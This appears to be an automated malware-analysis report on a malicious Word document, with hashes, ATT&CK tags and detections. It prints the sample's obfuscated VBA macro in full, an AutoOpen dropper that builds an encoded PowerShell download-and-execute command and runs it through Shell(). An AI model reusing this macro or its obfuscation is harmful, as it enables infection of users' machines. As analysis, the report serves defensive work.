Office (OLE) malware analysis — malicious · e34d95c9710f6a32

MALICIOUS

Office (OLE)

112.5 KB Created: 2018-06-19 17:50:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 79d8f9539098be9523f69aef82596ea0 SHA-1: bfc3a43e704d1825a15b3dac3e8e05a75c072499 SHA-256: e34d95c9710f6a32294df9f2d4ae60766320faba0f1eab04cb631abdda3aa7df

210 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function. This macro constructs and executes a PowerShell command. The command is designed to download content from a specific URL and execute it, indicating a downloader or dropper functionality. The ClamAV detection also confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6584815-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6584815-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

WIQCq = 55975
jzXGhi = IboOdBIi + Shell(dGWzuwS + ulUGGiLqhPb + nlPnWb, 96108 - 96108)
zwNZNZ = CDate(MliVc + Sin(82545 + 92193) * 49188 * CInt(91775))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub AutoOpen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10973 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10973 bytes
SHA-256: `29bb6ad5435df5dca1bcc4fd334367bbe083c7bfee20b04e90ad8e58a141abc9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PXoQzwzwoUU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "rAfOKTEGsIbEbr" Function wUDzFVOAv() On Error Resume Next VUBHK = CDate(89433) Efiwpp = CDate(QJKOC + Sin(32927 + 36308) * 69077 * CInt(84378)) BcpKDz = 36476 TArwjE = tNTjH DtDXZt = 74576 YVPCBl = CByte(FkWYc) HbAdiC = "Ow" + "erSHe" + "ll .( $PSHome[2" + "1]+$pSHOme[30" + "]+'X')( " + Chr(34) + " $" + "(SeT-varIAble" + " 'ofS' '') " + Chr(34) + "+[s" iEbVhI = CDate(42375) Vzutq = CDate(YGoUv + Sin(70282 + 60190) * 94470 * CInt(46183)) NLXBv = 48478 dvfbP = AYBSIM pptZRl = 42789 VLplc = CByte(nJCwX) TzzwPYjBLS = "Tring]( '29&" + "125" + "&110{104&111t1" + "05t25-4&25-" + "87%92%78" + "-20t86%91B83%92" + "K90-77}25<75%" rXwLV = CDate(97905) CKNLBk = CDate(AHoiOS + Sin(39029 + 28124) * 44412 * CInt(52960)) wuXnj = 39842 LzDPfZ = XvFXab VCBci = 41860 DnvhjZ = CByte(mdurmw) qFToFqsI = "88-87<93t8" + "6-84t2<29{8" + "6}114{73t87t" + "11" obdjMX = CDate(86734) SmpFB = CDate(mRtZQ + Sin(55256 + 82806) * 88728 * CInt(56232)) pLlVFJ = 44420 GwBUa = zuKAA HpsldP = 67525 BcAUfK = CByte(cmfnL) zkRiwuMB = "6<74z2" + "5K4%25{87" + "}92{78%20}8" + "6{91B83K92K90" + "-77%2" + "5<106{64&74&77" + "K9" + "2-84t23t" ouvBV = CDate(3490) Ejiwb = CDate(mKqSN + Sin(10783 + 30450) * 44700 * CInt(84043)) LPdoOK = 85207 bMGmA = cQFZj QTcTN = 99367 Winuz = CByte(aQVYq) DzIGq = "119B92<77%23K11" + "0<92{91&1" + "22&85<80B92" + "t87t77t2" + "<29&79z87&83" + "-126K109" + "<76t25K4z25z30" + "<81<77{77z73}3z" + "22%22t78z78%" wUDzFVOAv = HbAdiC + TzzwPYjBLS + qFToFqsI + zkRiwuMB + DzIGq End Function Function tvFVBjk() On Error Resume Next EOtBil = CDate(88704) pusQj = CDate(frAWb + Sin(6970 + 59412) * 57065 * CInt(14098)) YrjMjK = 93075 zAEtzn = zpzUd KEZCMI = 28119 wISafz = CByte(ToOPK) iEcoJXziGED = "78-23}93t9" + "0K20t77<92&90" + "z81t" + "23-75{76}22{10" + "5}8B85" mzCApS = CDate(4549) SUsMp = CDate(ZBXzL + Sin(20332 + 65567) * 73372 * CInt(86662)) Kvirco = 85139 kIarB = GYjjJf bwalFs = 11607 GLaHGB = CByte(hAXCqu) WOpBU = "t67" + "-120" + "<114-" + "22-121K81B77}" + "77z73&3{2" + "2}22<78B7" UjGuu = CDate(24382) AlZctn = CDate(pwAkD + Sin(79710 + 6391) * 89289 * CInt(92642)) uMZHw = 99684 JZIKSi = GPruOG MlDCsK = 31793 ijsAG = CByte(QjrKzd) bPijD = "8t78-23" + "<93z92&87&80{" + "67{92<84{8" + "5&88t82<9&15z" + "23{90{86t84}22" + "K13{92z77}" + "83{105z65t105{2" + "2<121B81t" dvMap = CDate(41147) RlABl = CDate(CGijh + Sin(83399 + 1552) * 18764 * CInt(54591)) SZbkr = 49771 Viqtqh = UpLud NAuVC = 59417 nLZjPl = CByte(ElhCw) jpEPTihMt = "77t77&73" + "B3B22" + "<22{78%78t78&23" + "<8" + "0%80{90B74B93" + "-92<8" + "5t81}80K23<86z" + "75<94t22" + "&65" + "&93%110t64&" jSfMaf = CDate(47930) VinVwi = CDate(VzjALb + Sin(23793 + 32235) * 40075 * CInt(57830)) KXwqi = 29980 hcIWE = uVvifL KJhAS = 25128 BALwM = CByte(Orwwb) jMqiAUfV = "124z" + "113B2" + "2-121t81z" + "77" + "B77" + "t73z3<22&22K78B" + "78z78<23K82&7" bdjrql = CDate(16954) BuMzHo = CDate(zCPco + Sin(94902 + 57505) * 30078 * CInt(46029)) zhattP = 97391 UdLNNH = oWOVw CIGJOL = 21673 FXCKi = CByte(zwZwi) KwicNGaUzd = "7-88%94-81" + "}88" + "K8" + "7%88-23K" + "90z86K84&" + "22t87%64}" + "110%9{10" + "4K22z12" + "1B81B77K" + "77K" KJlZsB = CDate(37189) UhnPE = CDate(cRjMO + Sin(38249 + 93322) * 61475 * CInt(95851)) Cuwwt = 20223 RHmYjA = haXBu UFwaz = 3546 qtzNL = CByte(WHzcn) Nqiojd = "73t3" + "K22K22B78t78t78" + "t23B94{76-75t7" + "6B88-87}9" + "3%9" + "0%86<23}8" + "0K87<22" TYGojL = CDate(65244) OGRtw = CDate(pWjwnq + Sin(53834 + 55070) * 45849 * CInt(37719)) FiJzi = 8575 hWiHM = hfRij ucnADJ = 58667 lNUqi = CByte(JHkPu) YQOZDjj = "<9-83-94" + "}94B91-85" + "{111B22{30" + "z23t106}73&8" + "5%80}77" hvFXo = CDate(40989) pYTtYj = CDate(WLVoiG + Sin(51464 + 24304) * 84448 * CInt(67239)) arAWmY = 74538 NdwAL = sLMKE OjRbO = 62444 EEqAnh = CByte(ozsBlk) pAuRlFUGTH = "t17%30z121}" + "30B16z2}" + "29}88K91B11" + "1K9" + "0-67-88&25" + "%4&25<29-1" MLAMTf = CDate(35212) GEQiMj = CDate(bwMSj + Sin(25927 + 76179) * 88148 * CInt(79032)) HPAKR = 75794 ZoAuCI = aZTLG jfzsR = 18030 NDinV = CByte(WMbrB) rcRJlr = "25%110" + "K104K111%105{23" + "K87K92K" + "65%77<17-8%" + "21}25&12-1" tvFVBjk = iEcoJXziGED + WOpBU + bPijD + jpEPTihMt + jMqiAUfV + KwicNGaUzd + Nqiojd + YQOZDjj + pAuRlFUGTH + rcRJlr End Function Function QlwpZSNnCq() On Error Resume Next DmMJUu = CDate(60742) hUWkCh = CDate(zRznsA + Sin(12026 + 96183) * 89640 * CInt(87512)) zbpjvP = 29665 WloisO = vwocZ VjlmGD = 64486 UbZRL = CByte(uqRADw) fNTZziMXok = "1K14}10t8<11K16" + "%2{29<" + "79K83<96K" + "75B116<25}4}25" + "%29" + "{92<87z79t3}77B" + "92t84K73-25" + "t18-25B30" XGlJX = CDate(84199) SIPTr = CDate(LmXpwi + Sin(83324 + 97330) * 19060 * CInt(9242)) wwqzA = 30459 AKKBzq = nivKCN THczub = 58125 qzoRP = CByte(Xtwzc) Wzmaw = "-101%30t25}" + "18B25<" + "29%" + "88z91}111K9" + "0%67t88z" BjJBfa = CDate(29354) PdUDk = CDate(OwllW + Sin(85865 + 74286) * 94331 * CInt(2058)) aDnAEA = 32467 fGaEdb = wjiBDq VqWIz = 47253 INBmIM = CByte(XUScfN) DEErTrj = "25t1" + "8-2" + "5{" + "30<23t92z65" + "}92{" + "30K2t95t8" + "6%75t92<88" VTGEKG = CDate(66116) jWizc = CDate(ZiAvF + Sin(89831 + 13837) * 79073 * CInt(29022)) FcaJX = 63557 zVIhz = LkKuwl VwRwb = 55611 JUJEii = CByte(YAKXn) izXMPwko = "&90z81-" + "17" + "K29t1" + "06z116-" tpiMn = CDate(16866) wnwfMQ = CDate(sPjkDq + Sin(93040 + 35636) * 33012 * CInt(43750)) iFFZwt = 7 hlOJU = JmnkQX IkVSi = 94107 SsXjE = CByte(HozBSp) zMjwMqqPQmH = "77}97B78t2" + "5<80K87{25K29" + "&79K87B" + "83&126-109t76{1" + "6B66&77}75t64}" ZdFbs = CDate(41555) TUioUf = CDate(tqwkFj + Sin(89600 + 75567) * 46794 * CInt(18310)) UnuPYO = 32027 LRBNFf = wVvJp jsovik = 74897 zObXL = CByte(GXQnTw) JOiirfTK = "66-" + "29%86t11" + "4{73t87<116}" + "74%23{12" VJAkBK = CDate(9306) szInW = CDate(iQofnd + Sin(92392 + 62129) * 87203 * CInt(17827)) jAMhR = 4007 tEzoN = PlIhWA jGzBZc = 56974 RblFv = CByte(hEaGPz) iKinpJRN = "5}86t7" + "8t87}85K86<88<" + "93z12" + "7B80t85<9" + "2-17{29{10" CNGIQL = CDate(99388) fuGQfm = CDate(JwAcO + Sin(77493 + 29868) * 51177 * CInt(84722)) ZuCnl = 50876 JwYAr = vSkPLn XZauqn = 67377 VipQqj = CByte(GFYiK) XsGAqoMkWr = "6}116K" + "77<97{78" + "-23z109-86-10" + "6%7" + "7K7" + "5B" + "80{87t94%" QlwpZSNnCq = fNTZziMXok + Wzmaw + DEErTrj + izXMPwko + zMjwMqqPQmH + JOiirfTK + iKinpJRN + XsGAqoMkWr End Function Function jFkCK() On Error Resume Next uWIWCd = CDate(4802) uZnJGw = CDate(kDiFt + Sin(44132 + 62719) * 55216 * CInt(46696)) LunwJX = 4027 sRKzN = WXBQX aGuzHK = 25771 EmnOBG = CByte(bjoRL) wCWijIbacp = "17t16&21-25{" + "29}7" + "9%83{96-75K116" + "<16{2}10" + "6z77%88&7" + "5z77z20z10" + "5t75%86z90t92" + "t74<74-25%29&" + "79B" + "83B96" QlFhf = CDate(10186) cLtPWP = CDate(SzIzI + Sin(69105 + 91775) * 19785 * CInt(11109)) FvIMq = 56388 Cdudwi = TdpjU ahlAiA = 46779 LRbOt = CByte(zKLsoj) RqpXqpfz = "}75{116}2<91z75" + "%92" + "&88{" + "82K2&6" + "8-90%" + "88-77{90K" + "81<66{78%75" + "-80<77z92&2" + "0{81{86B74" + "&77t25}29<102" sZpwHh = CDate(29956) jRJhO = CDate(wiwjf + Sin(24231 + 74744) * 62525 * CInt(26620)) riMiM = 6452 pKvjbA = XmPwFX FVfJNK = 94297 jwbGff = CByte(BKAfcm) cbcDnzAQE = "t23<124" + "B65B" + "90<9" + "2&73<7" + "7{80z86B87-23-" + "116B92K74" + "&74" wMtLRi = CDate(18284) dTDfrt = CDate(dzwBaM + Sin(12181 + 73768) * 87265 * CInt(20251)) RUCbBw = 95411 IjvOd = LCSHJQ SosjtI = 63863 JMLMI = CByte(ljvjTl) VcUhMmH = "B88t94}92-2-68" + "&68" + "'.spLIt( '}%" + "-{Ktz" + "B&<' ) \|ForeAch" + " { [" obTTj = CDate(27797) mUatld = CDate(FZpSr + Sin(47432 + 99486) * 37760 * CInt(51208)) DJGvl = 34543 IOpwOG = DvNdc mMXiZO = 34116 jsZAB = CByte(VZlPqN) NotMmaI = "ChaR] ( $_-BX" + "or'0x39' )} )+" + Chr(34) + "$( set-it" + "eM 'Vari" + "ABLe:ofs" + "' ' '" + ") " + Chr(34) + ")" jFkCK = wCWijIbacp + RqpXqpfz + cbcDnzAQE + VcUhMmH + NotMmaI End Function Function LValKNn() On Error Resume Next BfbOW = CDate(YDALVj + Sin(77428 + 84824) * 98119 * CInt(33791)) Ptrdwu = CByte(rkRdY) JCplj = CDate(45388) bIwskU = OZpsw BBIqYH = 23795 Epjsm = 68761 GfzvFP = CDate(zVDdf + Sin(87458 + 91829) * 27750 * CInt(40070)) vtkOK = CByte(NJbYbQ) RzzEj = CDate(8567) aiNEuN = QVXzd dGEVM = 82326 ApIIR = 30600 liwbB = CDate(ncrGq + Sin(29504 + 38784) * 97094 * CInt(15198)) wXQDiH = CByte(zqdMSo) jrAWLD = CDate(77524) wBWrRi = zEJZD oJukNo = 45485 rcUHZm = 72575 zdWIuM = CDate(suuKh + Sin(6202 + 85723) * 98844 * CInt(42596)) bZLlj = CByte(XKjwF) YAWrs = CDate(69964) woUjUS = KUjMDh DGLJO = 73863 TZWnc = 11024 IhFWQN = CDate(PGVrBR + Sin(90629 + 36014) * 36032 * CInt(75450)) PBNZi = CByte(tDQLiL) zZfJoM = CDate(60476) rUQJK = RXTqs QYNLc = 31581 XPkfH = 40173 End Function Function pVumBFjXmdo() On Error Resume Next wbQmo = CDate(KkLOIc + Sin(98999 + 39548) * 40092 * CInt(14609)) nJQCHN = CByte(PVKaz) zFtuq = CDate(43473) RjfhH = aEIwLz COcMo = 18462 iWRGr = 22760 kDXVUvWH = bNZIKd + Chr(aiaPBozi + 80 + ViJRYsrEAai) KscJOb = CDate(adwEm + Sin(46911 + 13373) * 16159 * CInt(94010)) zzBcz = CByte(cGqVqh) hjzznq = CDate(61485) ziFPal = iCziJ iOJClD = 14130 wNbPm = 13167 zqLITB = CDate(PQXfj + Sin(24535 + 23956) * 29982 * CInt(68018)) muRaX = CByte(QnIaW) HbiLiU = CDate(32119) WKHmKF = sCzwo TjKaf = 26476 jFPnb = 90596 pVumBFjXmdo = UArrs + kDXVUvWH + wUDzFVOAv + tvFVBjk + QlwpZSNnCq + jFkCK ZUZkUz = CDate(QodlnU + Sin(12117 + 10195) * 59262 * CInt(9385)) nXuLva = CByte(JJnml) PRBZb = CDate(85148) tzYwGz = JZtpUE JGWiBX = 70511 ftUTwJ = 82643 End Function Function LPPUZa(ulUGGiLqhPb) On Error Resume Next ljuvzz = CDate(bazpsV + Sin(66674 + 4577) * 44394 * CInt(33655)) Kmzni = CByte(SdNZvL) ibUYLH = CDate(52162) karFZO = VPPzHr wrUfCz = 32855 pSYGCr = 70318 KvVZH = CDate(ppRzHN + Sin(30650 + 29297) * 82630 * CInt(4301)) ZzGTX = CByte(tjGjP) jRbSFw = CDate(4624) YUpYr = VbILUZ lBnbGS = 9929 WIQCq = 55975 jzXGhi = IboOdBIi + Shell(dGWzuwS + ulUGGiLqhPb + nlPnWb, 96108 - 96108) zwNZNZ = CDate(MliVc + Sin(82545 + 92193) * 49188 * CInt(91775)) CMUaZ = CByte(hiMdS) zzzcUQ = CDate(93024) uzDoiD = YhcjM jLiLDP = 17159 qnShZ = 10405 End Function Sub AutoOpen() On Error Resume Next KJWUww = CDate(zFUlUP + Sin(66991 + 53639) * 47752 * CInt(20747)) pFDYD = CByte(aQsmVt) BjwkAf = CDate(75555) UQWZu = LKufD vMAwUs = 66665 TNvbi = 91456 Application.Run tuLpbcnD + "LPPUZa" + izCXbEOTVF, czXOnj + pVumBFjXmdo + TwSkmA ZoDjr = CDate(CfZGm + Sin(54667 + 39009) * 75070 * CInt(71474)) YYSEYZ = CByte(LWKkOS) mBCwr = CDate(1037) afncBY = ujPvU EGprQn = 35020 pUvRLz = 69587 End Sub

SHA-256: 29bb6ad5435df5dca1bcc4fd334367bbe083c7bfee20b04e90ad8e58a141abc9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PXoQzwzwoUU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rAfOKTEGsIbEbr"
Function wUDzFVOAv()
On Error Resume Next
VUBHK = CDate(89433)
Efiwpp = CDate(QJKOC + Sin(32927 + 36308) * 69077 * CInt(84378))
BcpKDz = 36476
TArwjE = tNTjH
DtDXZt = 74576
YVPCBl = CByte(FkWYc)
HbAdiC = "Ow" + "erSHe" + "ll .( $PSHome[2" + "1]+$pSHOme[30" + "]+'X')( " + Chr(34) + " $" + "(SeT-varIAble" + " 'ofS' '') " + Chr(34) + "+[s"
iEbVhI = CDate(42375)
Vzutq = CDate(YGoUv + Sin(70282 + 60190) * 94470 * CInt(46183))
NLXBv = 48478
dvfbP = AYBSIM
pptZRl = 42789
VLplc = CByte(nJCwX)
TzzwPYjBLS = "Tring]( '29&" + "125" + "&110{104&111t1" + "05t25-4&25-" + "87%92%78" + "-20t86%91B83%92" + "K90-77}25<75%"
rXwLV = CDate(97905)
CKNLBk = CDate(AHoiOS + Sin(39029 + 28124) * 44412 * CInt(52960))
wuXnj = 39842
LzDPfZ = XvFXab
VCBci = 41860
DnvhjZ = CByte(mdurmw)
qFToFqsI = "88-87<93t8" + "6-84t2<29{8" + "6}114{73t87t" + "11"
obdjMX = CDate(86734)
SmpFB = CDate(mRtZQ + Sin(55256 + 82806) * 88728 * CInt(56232))
pLlVFJ = 44420
GwBUa = zuKAA
HpsldP = 67525
BcAUfK = CByte(cmfnL)
zkRiwuMB = "6<74z2" + "5K4%25{87" + "}92{78%20}8" + "6{91B83K92K90" + "-77%2" + "5<106{64&74&77" + "K9" + "2-84t23t"
ouvBV = CDate(3490)
Ejiwb = CDate(mKqSN + Sin(10783 + 30450) * 44700 * CInt(84043))
LPdoOK = 85207
bMGmA = cQFZj
QTcTN = 99367
Winuz = CByte(aQVYq)
DzIGq = "119B92<77%23K11" + "0<92{91&1" + "22&85<80B92" + "t87t77t2" + "<29&79z87&83" + "-126K109" + "<76t25K4z25z30" + "<81<77{77z73}3z" + "22%22t78z78%"
wUDzFVOAv = HbAdiC + TzzwPYjBLS + qFToFqsI + zkRiwuMB + DzIGq
End Function
Function tvFVBjk()
On Error Resume Next
EOtBil = CDate(88704)
pusQj = CDate(frAWb + Sin(6970 + 59412) * 57065 * CInt(14098))
YrjMjK = 93075
zAEtzn = zpzUd
KEZCMI = 28119
wISafz = CByte(ToOPK)
iEcoJXziGED = "78-23}93t9" + "0K20t77<92&90" + "z81t" + "23-75{76}22{10" + "5}8B85"
mzCApS = CDate(4549)
SUsMp = CDate(ZBXzL + Sin(20332 + 65567) * 73372 * CInt(86662))
Kvirco = 85139
kIarB = GYjjJf
bwalFs = 11607
GLaHGB = CByte(hAXCqu)
WOpBU = "t67" + "-120" + "<114-" + "22-121K81B77}" + "77z73&3{2" + "2}22<78B7"
UjGuu = CDate(24382)
AlZctn = CDate(pwAkD + Sin(79710 + 6391) * 89289 * CInt(92642))
uMZHw = 99684
JZIKSi = GPruOG
MlDCsK = 31793
ijsAG = CByte(QjrKzd)
bPijD = "8t78-23" + "<93z92&87&80{" + "67{92<84{8" + "5&88t82<9&15z" + "23{90{86t84}22" + "K13{92z77}" + "83{105z65t105{2" + "2<121B81t"
dvMap = CDate(41147)
RlABl = CDate(CGijh + Sin(83399 + 1552) * 18764 * CInt(54591))
SZbkr = 49771
Viqtqh = UpLud
NAuVC = 59417
nLZjPl = CByte(ElhCw)
jpEPTihMt = "77t77&73" + "B3B22" + "<22{78%78t78&23" + "<8" + "0%80{90B74B93" + "-92<8" + "5t81}80K23<86z" + "75<94t22" + "&65" + "&93%110t64&"
jSfMaf = CDate(47930)
VinVwi = CDate(VzjALb + Sin(23793 + 32235) * 40075 * CInt(57830))
KXwqi = 29980
hcIWE = uVvifL
KJhAS = 25128
BALwM = CByte(Orwwb)
jMqiAUfV = "124z" + "113B2" + "2-121t81z" + "77" + "B77" + "t73z3<22&22K78B" + "78z78<23K82&7"
bdjrql = CDate(16954)
BuMzHo = CDate(zCPco + Sin(94902 + 57505) * 30078 * CInt(46029))
zhattP = 97391
UdLNNH = oWOVw
CIGJOL = 21673
FXCKi = CByte(zwZwi)
KwicNGaUzd = "7-88%94-81" + "}88" + "K8" + "7%88-23K" + "90z86K84&" + "22t87%64}" + "110%9{10" + "4K22z12" + "1B81B77K" + "77K"
KJlZsB = CDate(37189)
UhnPE = CDate(cRjMO + Sin(38249 + 93322) * 61475 * CInt(95851))
Cuwwt = 20223
RHmYjA = haXBu
UFwaz = 3546
qtzNL = CByte(WHzcn)
Nqiojd = "73t3" + "K22K22B78t78t78" + "t23B94{76-75t7" + "6B88-87}9" + "3%9" + "0%86<23}8" + "0K87<22"
TYGojL = CDate(65244)
OGRtw = CDate(pWjwnq + Sin(53834 + 55070) * 45849 * CInt(37719))
FiJzi = 8575
hWiHM = hfRij
ucnADJ = 58667
lNUqi = CByte(JHkPu)
YQOZDjj = "<9-83-94" + "}94B91-85" + "{111B22{30" + "z23t106}73&8" + "5%80}77"
hvFXo = CDate(40989)
pYTtYj = CDate(WLVoiG + Sin(51464 + 24304) * 84448 * CInt(67239))
arAWmY = 74538
NdwAL = sLMKE
OjRbO = 62444
EEqAnh = CByte(ozsBlk)
pAuRlFUGTH = "t17%30z121}" + "30B16z2}" + "29}88K91B11" + "1K9" + "0-67-88&25" + "%4&25<29-1"
MLAMTf = CDate(35212)
GEQiMj = CDate(bwMSj + Sin(25927 + 76179) * 88148 * CInt(79032))
HPAKR = 75794
ZoAuCI = aZTLG
jfzsR = 18030
NDinV = CByte(WMbrB)
rcRJlr = "25%110" + "K104K111%105{23" + "K87K92K" + "65%77<17-8%" + "21}25&12-1"
tvFVBjk = iEcoJXziGED + WOpBU + bPijD + jpEPTihMt + jMqiAUfV + KwicNGaUzd + Nqiojd + YQOZDjj + pAuRlFUGTH + rcRJlr
End Function
Function QlwpZSNnCq()
On Error Resume Next
DmMJUu = CDate(60742)
hUWkCh = CDate(zRznsA + Sin(12026 + 96183) * 89640 * CInt(87512))
zbpjvP = 29665
WloisO = vwocZ
VjlmGD = 64486
UbZRL = CByte(uqRADw)
fNTZziMXok = "1K14}10t8<11K16" + "%2{29<" + "79K83<96K" + "75B116<25}4}25" + "%29" + "{92<87z79t3}77B" + "92t84K73-25" + "t18-25B30"
XGlJX = CDate(84199)
SIPTr = CDate(LmXpwi + Sin(83324 + 97330) * 19060 * CInt(9242))
wwqzA = 30459
AKKBzq = nivKCN
THczub = 58125
qzoRP = CByte(Xtwzc)
Wzmaw = "-101%30t25}" + "18B25<" + "29%" + "88z91}111K9" + "0%67t88z"
BjJBfa = CDate(29354)
PdUDk = CDate(OwllW + Sin(85865 + 74286) * 94331 * CInt(2058))
aDnAEA = 32467
fGaEdb = wjiBDq
VqWIz = 47253
INBmIM = CByte(XUScfN)
DEErTrj = "25t1" + "8-2" + "5{" + "30<23t92z65" + "}92{" + "30K2t95t8" + "6%75t92<88"
VTGEKG = CDate(66116)
jWizc = CDate(ZiAvF + Sin(89831 + 13837) * 79073 * CInt(29022))
FcaJX = 63557
zVIhz = LkKuwl
VwRwb = 55611
JUJEii = CByte(YAKXn)
izXMPwko = "&90z81-" + "17" + "K29t1" + "06z116-"
tpiMn = CDate(16866)
wnwfMQ = CDate(sPjkDq + Sin(93040 + 35636) * 33012 * CInt(43750))
iFFZwt = 7
hlOJU = JmnkQX
IkVSi = 94107
SsXjE = CByte(HozBSp)
zMjwMqqPQmH = "77}97B78t2" + "5<80K87{25K29" + "&79K87B" + "83&126-109t76{1" + "6B66&77}75t64}"
ZdFbs = CDate(41555)
TUioUf = CDate(tqwkFj + Sin(89600 + 75567) * 46794 * CInt(18310))
UnuPYO = 32027
LRBNFf = wVvJp
jsovik = 74897
zObXL = CByte(GXQnTw)
JOiirfTK = "66-" + "29%86t11" + "4{73t87<116}" + "74%23{12"
VJAkBK = CDate(9306)
szInW = CDate(iQofnd + Sin(92392 + 62129) * 87203 * CInt(17827))
jAMhR = 4007
tEzoN = PlIhWA
jGzBZc = 56974
RblFv = CByte(hEaGPz)
iKinpJRN = "5}86t7" + "8t87}85K86<88<" + "93z12" + "7B80t85<9" + "2-17{29{10"
CNGIQL = CDate(99388)
fuGQfm = CDate(JwAcO + Sin(77493 + 29868) * 51177 * CInt(84722))
ZuCnl = 50876
JwYAr = vSkPLn
XZauqn = 67377
VipQqj = CByte(GFYiK)
XsGAqoMkWr = "6}116K" + "77<97{78" + "-23z109-86-10" + "6%7" + "7K7" + "5B" + "80{87t94%"
QlwpZSNnCq = fNTZziMXok + Wzmaw + DEErTrj + izXMPwko + zMjwMqqPQmH + JOiirfTK + iKinpJRN + XsGAqoMkWr
End Function
Function jFkCK()
On Error Resume Next
uWIWCd = CDate(4802)
uZnJGw = CDate(kDiFt + Sin(44132 + 62719) * 55216 * CInt(46696))
LunwJX = 4027
sRKzN = WXBQX
aGuzHK = 25771
EmnOBG = CByte(bjoRL)
wCWijIbacp = "17t16&21-25{" + "29}7" + "9%83{96-75K116" + "<16{2}10" + "6z77%88&7" + "5z77z20z10" + "5t75%86z90t92" + "t74<74-25%29&" + "79B" + "83B96"
QlFhf = CDate(10186)
cLtPWP = CDate(SzIzI + Sin(69105 + 91775) * 19785 * CInt(11109))
FvIMq = 56388
Cdudwi = TdpjU
ahlAiA = 46779
LRbOt = CByte(zKLsoj)
RqpXqpfz = "}75{116}2<91z75" + "%92" + "&88{" + "82K2&6" + "8-90%" + "88-77{90K" + "81<66{78%75" + "-80<77z92&2" + "0{81{86B74" + "&77t25}29<102"
sZpwHh = CDate(29956)
jRJhO = CDate(wiwjf + Sin(24231 + 74744) * 62525 * CInt(26620))
riMiM = 6452
pKvjbA = XmPwFX
FVfJNK = 94297
jwbGff = CByte(BKAfcm)
cbcDnzAQE = "t23<124" + "B65B" + "90<9" + "2&73<7" + "7{80z86B87-23-" + "116B92K74" + "&74"
wMtLRi = CDate(18284)
dTDfrt = CDate(dzwBaM + Sin(12181 + 73768) * 87265 * CInt(20251))
RUCbBw = 95411
IjvOd = LCSHJQ
SosjtI = 63863
JMLMI = CByte(ljvjTl)
VcUhMmH = "B88t94}92-2-68" + "&68" + "'.spLIt( '}%" + "-{Ktz" + "B&<' ) |ForeAch" + " { ["
obTTj = CDate(27797)
mUatld = CDate(FZpSr + Sin(47432 + 99486) * 37760 * CInt(51208))
DJGvl = 34543
IOpwOG = DvNdc
mMXiZO = 34116
jsZAB = CByte(VZlPqN)
NotMmaI = "ChaR] ( $_-BX" + "or'0x39' )} )+" + Chr(34) + "$( set-it" + "eM  'Vari" + "ABLe:ofs" + "'  ' '" + ") " + Chr(34) + ")"
jFkCK = wCWijIbacp + RqpXqpfz + cbcDnzAQE + VcUhMmH + NotMmaI
End Function

Function LValKNn()
On Error Resume Next
BfbOW = CDate(YDALVj + Sin(77428 + 84824) * 98119 * CInt(33791))
Ptrdwu = CByte(rkRdY)
JCplj = CDate(45388)
bIwskU = OZpsw
BBIqYH = 23795
Epjsm = 68761
GfzvFP = CDate(zVDdf + Sin(87458 + 91829) * 27750 * CInt(40070))
vtkOK = CByte(NJbYbQ)
RzzEj = CDate(8567)
aiNEuN = QVXzd
dGEVM = 82326
ApIIR = 30600
liwbB = CDate(ncrGq + Sin(29504 + 38784) * 97094 * CInt(15198))
wXQDiH = CByte(zqdMSo)
jrAWLD = CDate(77524)
wBWrRi = zEJZD
oJukNo = 45485
rcUHZm = 72575
zdWIuM = CDate(suuKh + Sin(6202 + 85723) * 98844 * CInt(42596))
bZLlj = CByte(XKjwF)
YAWrs = CDate(69964)
woUjUS = KUjMDh
DGLJO = 73863
TZWnc = 11024
IhFWQN = CDate(PGVrBR + Sin(90629 + 36014) * 36032 * CInt(75450))
PBNZi = CByte(tDQLiL)
zZfJoM = CDate(60476)
rUQJK = RXTqs
QYNLc = 31581
XPkfH = 40173
End Function
Function pVumBFjXmdo()
On Error Resume Next
wbQmo = CDate(KkLOIc + Sin(98999 + 39548) * 40092 * CInt(14609))
nJQCHN = CByte(PVKaz)
zFtuq = CDate(43473)
RjfhH = aEIwLz
COcMo = 18462
iWRGr = 22760
kDXVUvWH = bNZIKd + Chr(aiaPBozi + 80 + ViJRYsrEAai)
KscJOb = CDate(adwEm + Sin(46911 + 13373) * 16159 * CInt(94010))
zzBcz = CByte(cGqVqh)
hjzznq = CDate(61485)
ziFPal = iCziJ
iOJClD = 14130
wNbPm = 13167
zqLITB = CDate(PQXfj + Sin(24535 + 23956) * 29982 * CInt(68018))
muRaX = CByte(QnIaW)
